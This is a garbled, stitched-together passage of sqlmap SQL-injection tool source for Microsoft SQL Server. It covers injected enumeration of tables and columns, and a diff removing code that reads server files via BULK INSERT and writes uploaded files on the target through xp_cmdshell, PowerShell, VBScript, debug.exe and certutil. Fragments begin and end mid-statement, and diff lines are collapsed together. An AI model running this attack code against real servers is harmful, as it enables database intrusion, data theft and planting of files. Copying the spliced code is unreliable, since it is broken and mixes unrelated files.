    @staticmethod
    def escape(expression, quote=True):
        """
        Return *expression* unchanged (no quote escaping on MaxDB).

        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
        "SELECT 'abcdefgh' FROM foobar"
        """
        return expression
class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
    """
    This class defines Microsoft SQL Server methods
    """

    def __init__(self):
        # System databases are excluded from enumeration unless the user
        # asks for them explicitly
        self.excludeDbsList = MSSQL_SYSTEM_DBS

        # The mixins do not cooperate via super(), so every base class
        # __init__ is invoked explicitly, in this order
        Syntax.__init__(self)
        Fingerprint.__init__(self)
        Enumeration.__init__(self)
        Filesystem.__init__(self)
        Miscellaneous.__init__(self)
        Takeover.__init__(self)

        # Register the MSSQL string-literal escaper with the global
        # unescaper registry (module-level side effect used by payload code)
        unescaper[DBMS.MSSQL] = Syntax.escape
class Connector(GenericConnector):
    """
    Direct-connection support for Microsoft SQL Server via pymssql.

    Homepage: http://pymssql.sourceforge.net/
    User guide: http://pymssql.sourceforge.net/examples_pymssql.php
    API: http://pymssql.sourceforge.net/ref_pymssql.php
    Debian package: python-pymssql
    License: LGPL

    Possible connectors: http://wiki.python.org/moin/SQL%20Server

    Important note: pymssql library on your system MUST be version 1.0.2
    to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/
    """

    def __init__(self):
        GenericConnector.__init__(self)

    def connect(self):
        """Open the connection and cursor; raises SqlmapConnectionException on failure."""
        self.initConnection()

        try:
            self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
        # "except E as e" is valid on Python 2.6+ AND 3.x (the legacy
        # comma form "except E, e" is a syntax error on Python 3)
        except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException) as msg:
            raise SqlmapConnectionException(msg)

        self.initCursor()
        self.printConnected()

    def fetchall(self):
        """Return all rows of the last executed query, or None on a (logged) driver error."""
        try:
            return self.cursor.fetchall()
        except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException) as msg:
            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
            return None

    def execute(self, query):
        """Execute *query*; return True on success, False on recoverable remote errors."""
        retVal = False

        try:
            self.cursor.execute(utf8encode(query))
            retVal = True
        except (pymssql.OperationalError, pymssql.ProgrammingError) as msg:
            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
        except pymssql.InternalError as msg:
            # Internal driver errors are not recoverable - propagate
            raise SqlmapConnectionException(msg)

        return retVal

    def select(self, query):
        """Execute *query* and return its result set (None on failure), committing afterwards."""
        retVal = None

        if self.execute(query):
            retVal = self.fetchall()

        # Best-effort commit; some statements cannot be committed
        try:
            self.connector.commit()
        except pymssql.OperationalError:
            pass

        return retVal
    def getTables(self):
        """
        Return a dict {database: [table, ...]} for the databases selected
        via conf.db (or all databases), using the session cache when present.

        Tries inband techniques (UNION/error/stacked) first, then falls back
        to blind inference; raises SqlmapNoneDataException when nothing could
        be retrieved and no search is in progress.
        """
        if len(kb.data.cachedTables) > 0:
            return kb.data.cachedTables

        self.forceDbmsEnum()

        if conf.db == CURRENT_DB:
            conf.db = self.getCurrentDb()

        if conf.db:
            dbs = conf.db.split(",")
        else:
            dbs = self.getDbs()

        for db in dbs:
            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)

        dbs = filter(None, dbs)

        infoMsg = "fetching tables for database"
        infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs)))
        logger.info(infoMsg)

        rootQuery = queries[Backend.getIdentifiedDbms()].tables

        # Inband path: direct retrieval when a fast technique is available
        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
            for db in dbs:
                if conf.excludeSysDbs and db in self.excludeDbsList:
                    infoMsg = "skipping system database '%s'" % db
                    logger.info(infoMsg)

                    continue

                # Three alternative query forms for different MSSQL versions;
                # first one returning data wins
                for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3):
                    query = query.replace("%s", db)
                    value = inject.getValue(query, blind=False, time=False)
                    if not isNoneValue(value):
                        break

                if not isNoneValue(value):
                    value = filter(None, arrayizeValue(value))
                    value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value]
                    kb.data.cachedTables[db] = value

        # Blind path: count the tables, then fetch them one index at a time
        if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:
            for db in dbs:
                if conf.excludeSysDbs and db in self.excludeDbsList:
                    infoMsg = "skipping system database '%s'" % db
                    logger.info(infoMsg)

                    continue

                infoMsg = "fetching number of tables for "
                infoMsg += "database '%s'" % db
                logger.info(infoMsg)

                for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
                    _ = query.replace("%s", db)
                    count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
                    if not isNoneValue(count):
                        break

                if not isNumPosStrValue(count):
                    if count != 0:
                        warnMsg = "unable to retrieve the number of "
                        warnMsg += "tables for database '%s'" % db
                        logger.warn(warnMsg)
                    continue

                tables = []

                for index in xrange(int(count)):
                    # Pair each blind row query with the count variant that
                    # succeeded above
                    _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)

                    table = inject.getValue(_, union=False, error=False)
                    if not isNoneValue(table):
                        kb.hintValue = table
                        table = safeSQLIdentificatorNaming(table, True)
                        tables.append(table)

                if tables:
                    kb.data.cachedTables[db] = tables
                else:
                    warnMsg = "unable to retrieve the tables "
                    warnMsg += "for database '%s'" % db
                    logger.warn(warnMsg)

        if not kb.data.cachedTables and not conf.search:
            errMsg = "unable to retrieve the tables for any database"
            raise SqlmapNoneDataException(errMsg)
        else:
            for db, tables in kb.data.cachedTables.items():
                kb.data.cachedTables[db] = sorted(tables) if tables else tables

        return kb.data.cachedTables
"1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.info(infoMsg) - - tblQuery = "%s%s" % (tblCond, tblCondParam) - tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) - - for db in foundTbls.keys(): - db = safeSQLIdentificatorNaming(db) - - if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) - - continue - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query.replace("%s", db) - query += tblQuery - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - if isinstance(values, basestring): - values = [values] - - for foundTbl in values: - if foundTbl is None: - continue - - foundTbls[db].append(foundTbl) - else: - infoMsg = "fetching number of table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) - logger.info(infoMsg) - - query = rootQuery.blind.count - query = query.replace("%s", db) - query += " AND %s" % tblQuery - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no table" - if tblConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query.replace("%s", db) - query += " AND %s" % tblQuery - query = agent.limitQuery(index, query, tblCond) - tbl = inject.getValue(query, union=False, error=False) - kb.hintValue = tbl - foundTbls[db].append(tbl) - - for db, tbls in foundTbls.items(): - if len(tbls) == 0: - foundTbls.pop(db) - - if not 
    def searchColumn(self):
        """
        Search all (or the selected) databases for tables containing the
        column name(s) given in conf.col, then dump what was found.

        NOTE(review): temporarily rewrites conf.db/conf.tbl/conf.col while
        recursing into getColumns() and restores them per iteration from
        origDb/origTbl - statement order matters throughout.
        """
        rootQuery = queries[Backend.getIdentifiedDbms()].search_column
        foundCols = {}
        dbs = {}
        whereTblsQuery = ""
        infoMsgTbl = ""
        infoMsgDb = ""
        colList = conf.col.split(",")

        if conf.excludeCol:
            colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')]

        origTbl = conf.tbl
        origDb = conf.db
        colCond = rootQuery.inband.condition
        tblCond = rootQuery.inband.condition2
        colConsider, colCondParam = self.likeOrExact("column")

        if conf.db and conf.db != CURRENT_DB:
            enumDbs = conf.db.split(",")
        elif not len(kb.data.cachedDbs):
            enumDbs = self.getDbs()
        else:
            enumDbs = kb.data.cachedDbs

        for db in enumDbs:
            db = safeSQLIdentificatorNaming(db)
            dbs[db] = {}

        for column in colList:
            column = safeSQLIdentificatorNaming(column)
            # Restore the user's original scope before each column pass
            conf.db = origDb
            conf.tbl = origTbl

            infoMsg = "searching column"
            if colConsider == "1":
                infoMsg += "s LIKE"
            infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)

            foundCols[column] = {}

            if conf.tbl:
                _ = conf.tbl.split(",")
                whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
                infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _))

            if conf.db and conf.db != CURRENT_DB:
                _ = conf.db.split(",")
                infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
            elif conf.excludeSysDbs:
                infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
                logger.info(infoMsg2)
            else:
                infoMsgDb = " across all databases"

            logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))

            colQuery = "%s%s" % (colCond, colCondParam)
            colQuery = colQuery % unsafeSQLIdentificatorNaming(column)

            for db in filter(None, dbs.keys()):
                db = safeSQLIdentificatorNaming(db)

                if conf.excludeSysDbs and db in self.excludeDbsList:
                    continue

                # Inband path: direct retrieval when a fast technique exists
                if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
                    # The template references the database name six times
                    query = rootQuery.inband.query % (db, db, db, db, db, db)
                    query += " AND %s" % colQuery.replace("[DB]", db)
                    query += whereTblsQuery.replace("[DB]", db)
                    values = inject.getValue(query, blind=False, time=False)

                    if not isNoneValue(values):
                        if isinstance(values, basestring):
                            values = [values]

                        for foundTbl in values:
                            foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True)

                            if foundTbl is None:
                                continue

                            if foundTbl not in dbs[db]:
                                dbs[db][foundTbl] = {}

                            if colConsider == "1":
                                # LIKE search: recurse to resolve the actual
                                # matching column names/types
                                conf.db = db
                                conf.tbl = foundTbl
                                conf.col = column

                                self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)

                                if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\
                                   and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
                                    dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
                                kb.data.cachedColumns = {}
                            else:
                                dbs[db][foundTbl][column] = None

                            if db in foundCols[column]:
                                foundCols[column][db].append(foundTbl)
                            else:
                                foundCols[column][db] = [foundTbl]
                else:
                    # Blind path: count matching tables, then fetch each by index
                    foundCols[column][db] = []

                    infoMsg = "fetching number of tables containing column"
                    if colConsider == "1":
                        infoMsg += "s LIKE"
                    infoMsg += " '%s' in database '%s'" % (column, db)
                    logger.info("%s%s" % (infoMsg, infoMsgTbl))

                    query = rootQuery.blind.count
                    query = query % (db, db, db, db, db, db)
                    query += " AND %s" % colQuery.replace("[DB]", db)
                    query += whereTblsQuery.replace("[DB]", db)
                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

                    if not isNumPosStrValue(count):
                        warnMsg = "no tables contain column"
                        if colConsider == "1":
                            warnMsg += "s LIKE"
                        warnMsg += " '%s' " % column
                        warnMsg += "in database '%s'" % db
                        logger.warn(warnMsg)

                        continue

                    indexRange = getLimitRange(count)

                    for index in indexRange:
                        query = rootQuery.blind.query
                        query = query % (db, db, db, db, db, db)
                        query += " AND %s" % colQuery.replace("[DB]", db)
                        query += whereTblsQuery.replace("[DB]", db)
                        query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
                        tbl = inject.getValue(query, union=False, error=False)
                        kb.hintValue = tbl

                        tbl = safeSQLIdentificatorNaming(tbl, True)

                        if tbl not in dbs[db]:
                            dbs[db][tbl] = {}

                        if colConsider == "1":
                            conf.db = db
                            conf.tbl = tbl
                            conf.col = column

                            self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)

                            if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:
                                dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
                            kb.data.cachedColumns = {}
                        else:
                            dbs[db][tbl][column] = None

                        foundCols[column][db].append(tbl)

        conf.dumper.dbColumns(foundCols, colConsider, dbs)
        self.dumpFoundColumn(dbs, foundCols, colConsider)
-from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject - -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def _dataToScr(self, fileContent, chunkName): - fileLines = [] - fileSize = len(fileContent) - lineAddr = 0x100 - lineLen = 20 - - fileLines.append("n %s" % chunkName) - fileLines.append("rcx") - fileLines.append("%x" % fileSize) - fileLines.append("f 0100 %x 00" % fileSize) - - for fileLine in xrange(0, len(fileContent), lineLen): - scrString = "" - - for lineChar in fileContent[fileLine:fileLine + lineLen]: - strLineChar = hexencode(lineChar) - - if not scrString: - scrString = "e %x %s" % (lineAddr, strLineChar) - else: - scrString += " %s" % strLineChar - - lineAddr += len(lineChar) - - fileLines.append(scrString) - - fileLines.append("w") - fileLines.append("q") - - return fileLines - - def _updateDestChunk(self, fileContent, tmpPath): - randScr = "tmpf%s.scr" % randomStr(lowercase=True) - chunkName = randomStr(lowercase=True) - fileScrLines = self._dataToScr(fileContent, chunkName) - - logger.debug("uploading debug script to %s\%s, please wait.." 
% (tmpPath, randScr)) - - self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) - - logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) - - commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - return chunkName - - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - result = [] - txtTbl = self.fileTblName - hexTbl = "%shex" % self.fileTblName - - self.createSupportTbl(txtTbl, self.tblField, "text") - inject.goStacked("DROP TABLE %s" % hexTbl) - inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) - - logger.debug("loading the content of file '%s' into support table" % rFile) - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True) - - # Reference: http://support.microsoft.com/kb/104829 - binToHexQuery = """DECLARE @charset VARCHAR(16) - DECLARE @counter INT - DECLARE @hexstr VARCHAR(4096) - DECLARE @length INT - DECLARE @chunk INT - - SET @charset = '0123456789ABCDEF' - SET @counter = 1 - SET @hexstr = '' - SET @length = (SELECT DATALENGTH(%s) FROM %s) - SET @chunk = 1024 - - WHILE (@counter <= @length) - BEGIN - DECLARE @tempint INT - DECLARE @firstint INT - DECLARE @secondint INT - - SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s)) - SET @firstint = floor(@tempint/16) - SET @secondint = @tempint - (@firstint * 16) - SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) - - SET @counter = @counter + 1 - - IF @counter %% @chunk = 0 - BEGIN - INSERT INTO %s(%s) VALUES(@hexstr) - SET @hexstr = '' - END - END - - IF @counter %% (@chunk) != 0 - BEGIN - INSERT INTO %s(%s) VALUES(@hexstr) - END - """ 
% (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField) - - binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ") - inject.goStacked(binToHexQuery) - - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False) - - if not result: - result = [] - count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - errMsg = "unable to retrieve the content of the " - errMsg += "file '%s'" % rFile - raise SqlmapNoneDataException(errMsg) - - indexRange = getLimitRange(count) - - for index in indexRange: - chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - result.append(chunk) - - inject.goStacked("DROP TABLE %s" % hexTbl) - - return result - - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): - errMsg = "Microsoft SQL Server does not support file upload with " - errMsg += "UNION query SQL injection technique" - raise SqlmapUnsupportedFeatureException(errMsg) - - def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): - infoMsg = "using PowerShell to write the %s file content " % fileType - infoMsg += "to file '%s'" % dFile - logger.info(infoMsg) - - encodedFileContent = base64encode(wFileContent) - encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) - encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) - - randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) - randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) - - wFileSize = len(encodedFileContent) - chunkMaxSize = 1024 - - logger.debug("uploading the 
base64-encoded file to %s, please wait.." % encodedBase64FilePath) - - for i in xrange(0, wFileSize, chunkMaxSize): - wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] - self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) - - psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath - psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " - psString += "[System.Convert]::FromBase64String($Base64); Set-Content " - psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile - - logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) - self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) - - logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) - - commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, - "del /F /Q \"%s\"" % encodedBase64FilePath, - "del /F /Q \"%s\"" % randPSScriptPath) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): - infoMsg = "using debug.exe to write the %s " % fileType - infoMsg += "file content to file '%s', please wait.." % dFile - logger.info(infoMsg) - - dFileName = ntpath.basename(dFile) - sFile = "%s\%s" % (tmpPath, dFileName) - wFileSize = os.path.getsize(wFile) - debugSize = 0xFF00 - - if wFileSize < debugSize: - chunkName = self._updateDestChunk(wFileContent, tmpPath) - - debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) - debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) - logger.debug(debugMsg) - - commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - else: - debugMsg = "the file is larger than %d bytes. 
" % debugSize - debugMsg += "sqlmap will split it into chunks locally, upload " - debugMsg += "it chunk by chunk and recreate the original file " - debugMsg += "on the server, please wait.." - logger.debug(debugMsg) - - for i in xrange(0, wFileSize, debugSize): - wFileChunk = wFileContent[i:i + debugSize] - chunkName = self._updateDestChunk(wFileChunk, tmpPath) - - if i == 0: - debugMsg = "renaming chunk " - copyCmd = "ren %s %s" % (chunkName, dFileName) - else: - debugMsg = "appending chunk " - copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) - - debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) - logger.debug(debugMsg) - - commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) - - commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): - infoMsg = "using a custom visual basic script to write the " - infoMsg += "%s file content to file '%s', please wait.." 
% (fileType, dFile) - logger.info(infoMsg) - - randVbs = "tmps%s.vbs" % randomStr(lowercase=True) - randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - - vbs = """Dim inputFilePath, outputFilePath - inputFilePath = "%s" - outputFilePath = "%s" - Set fs = CreateObject("Scripting.FileSystemObject") - Set file = fs.GetFile(inputFilePath) - If file.Size Then - Wscript.Echo "Loading from: " & inputFilePath - Wscript.Echo - Set fd = fs.OpenTextFile(inputFilePath, 1) - data = fd.ReadAll - fd.Close - data = Replace(data, " ", "") - data = Replace(data, vbCr, "") - data = Replace(data, vbLf, "") - Wscript.Echo "Fixed Input: " - Wscript.Echo data - Wscript.Echo - decodedData = base64_decode(data) - Wscript.Echo "Output: " - Wscript.Echo decodedData - Wscript.Echo - Wscript.Echo "Writing output in: " & outputFilePath - Wscript.Echo - Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) - ofs.Write decodedData - ofs.close - Else - Wscript.Echo "The file is empty." 
- End If - Function base64_decode(byVal strIn) - Dim w1, w2, w3, w4, n, strOut - For n = 1 To Len(strIn) Step 4 - w1 = mimedecode(Mid(strIn, n, 1)) - w2 = mimedecode(Mid(strIn, n + 1, 1)) - w3 = mimedecode(Mid(strIn, n + 2, 1)) - w4 = mimedecode(Mid(strIn, n + 3, 1)) - If Not w2 Then _ - strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) - If Not w3 Then _ - strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) - If Not w4 Then _ - strOut = strOut + Chr(((w3 * 64 + w4) And 255)) - Next - base64_decode = strOut - End Function - Function mimedecode(byVal strIn) - Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" - If Len(strIn) = 0 Then - mimedecode = -1 : Exit Function - Else - mimedecode = InStr(Base64Chars, strIn) - 1 - End If - End Function""" % (randFilePath, dFile) - - vbs = vbs.replace(" ", "") - encodedFileContent = base64encode(wFileContent) - - logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) - - self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) - - logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) - - self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) - - commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, - "del /F /Q %s" % randVbs, - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): - infoMsg = "using certutil.exe to write the %s " % fileType - infoMsg += "file content to file '%s', please wait.." 
% dFile - logger.info(infoMsg) - - chunkMaxSize = 500 - - randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - - encodedFileContent = base64encode(wFileContent) - - splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) - - logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) - - self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) - - logger.debug("decoding the file to %s.." % dFile) - - commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - # NOTE: this is needed here because we use xp_cmdshell extended - # procedure to write a file on the back-end Microsoft SQL Server - # file system - self.initEnv() - - self.getRemoteTempPath() - - tmpPath = posixToNtSlashes(conf.tmpPath) - dFile = posixToNtSlashes(dFile) - with open(wFile, "rb") as f: - wFileContent = f.read() - - self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - if written is False: - message = "do you want to try to upload the file with " - message += "the custom Visual Basic script technique? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice.lower() == "y": - self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - if written is False: - message = "do you want to try to upload the file with " - message += "the built-in debug.exe technique? 
[Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice.lower() == "y": - self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - if written is False: - message = "do you want to try to upload the file with " - message += "the built-in certutil.exe technique? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice.lower() == "y": - self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - return written diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py deleted file mode 100644 index 891f3f05..00000000 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ /dev/null @@ -1,194 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import MSSQL_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.MSSQL) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - blank = " " * 15 - value += 
"active fingerprint: %s" % actVer - - if kb.bannerFp: - release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None - version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None - - if release and version and servicepack: - banVer = "%s %s " % (DBMS.MSSQL, release) - banVer += "Service Pack %s " % servicepack - banVer += "version %s" % version - - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \ - or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): - setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) - - self.getBanner() - - Backend.setOs(OS.WINDOWS) - - return True - - infoMsg = "testing %s" % DBMS.MSSQL - logger.info(infoMsg) - - # NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not - # work connecting directly to the Microsoft SQL Server database - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("SQUARE([RANDNUM])=SQUARE([RANDNUM])") - - if result: - infoMsg = "confirming %s" % DBMS.MSSQL - logger.info(infoMsg) - - for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), 